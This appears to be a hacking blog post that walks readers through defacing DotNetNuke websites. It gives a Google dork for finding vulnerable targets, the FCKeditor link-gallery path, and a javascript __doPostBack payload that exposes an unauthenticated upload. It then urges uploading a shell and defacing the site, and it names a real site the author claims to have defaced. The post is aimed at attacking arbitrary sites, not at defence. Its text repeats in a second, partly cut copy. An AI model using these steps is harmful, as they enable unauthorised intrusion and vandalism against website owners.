It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting.
DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provideContent Management System (CMS) for the personal website .
Below are the easy steps to implement the attack:
• First use a googledork to find the appropriate target.
inurl:”/portals/0? site:.com
• You can change com to your desired domain name like bd ph ae
• Now search your website on the google after searching you will get many websites choose any one of it.
• Its time to check the required vulnerability on the website just place this code after theweb address .
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
• For example if you got http://www.victim.com/
• Replace it www.victim.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
• If you will get this screen means this web is going to hack.
• Now choose the third option “A File On Your Site” And than paste thisjava code on your address bar .
javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
• It will allow you to upload a files on this website you can upload text ~swf ~ jpg ~ gif ~ pdf ~ Files.
• After uploading files you can find your file on this address www.victim.com/portals/0/yourfile.extension
here extension is txt jpg swf etc.
Now i will hack a web.The web address is
http://dnn551.biuro.in
now add in the end of link
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Screen shot
now delete the link and write this code
javascript:__doPostBack('ctlURL$cmdUpload','')
Browse option will come upload your shell their and delete and defaced the web...
Pic are not uploading so here the link of defaced web
http://dnn551.biuro.in/portals/0/ikony/index2.html
HAPPY HACKING I WILL BE KEEP POSTING GOOD TUTORIAL FOR YOU...
FOR FEED BACK
http://facebook.com/ullah.sadat
DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide
Below are the easy steps to implement the attack:
• First use a google
inurl:”/portals/0? site:.com
• You can change com to your desired domain name like bd ph ae
• Now search your website on the google after searching you will get many websites choose any one of it.
• Its time to check the required vulnerability on the website just place this code after the
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
• For example if you got http://www.victim.com/
• Replace it www.victim.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
• If you will get this screen means this web is going to hack.
• Now choose the third option “A File On Your Site” And than paste this
javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
• It will allow you to upload a files on this website you can upload text ~
• After uploading files you can find your file on this address www.victim.com/portals/0/yourfile.extension
here extension is txt jpg swf etc.
Now i will hack a web.The web address is
http://dnn551.biuro.in
now add in the end of link
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Screen shot
javascript:__doPostBack('ctlURL$cmdUpload','')
Browse option will come upload your shell their and delete and defaced the web...
Pic are not uploading so here the link of defaced web
http://dnn551.biuro.in/portals/0/ikony/index2.html
HAPPY HACKING I WILL BE KEEP POSTING GOOD TUTORIAL FOR YOU...
FOR FEED BACK
http://facebook.com/ullah.sadat
0 comments:
Post a Comment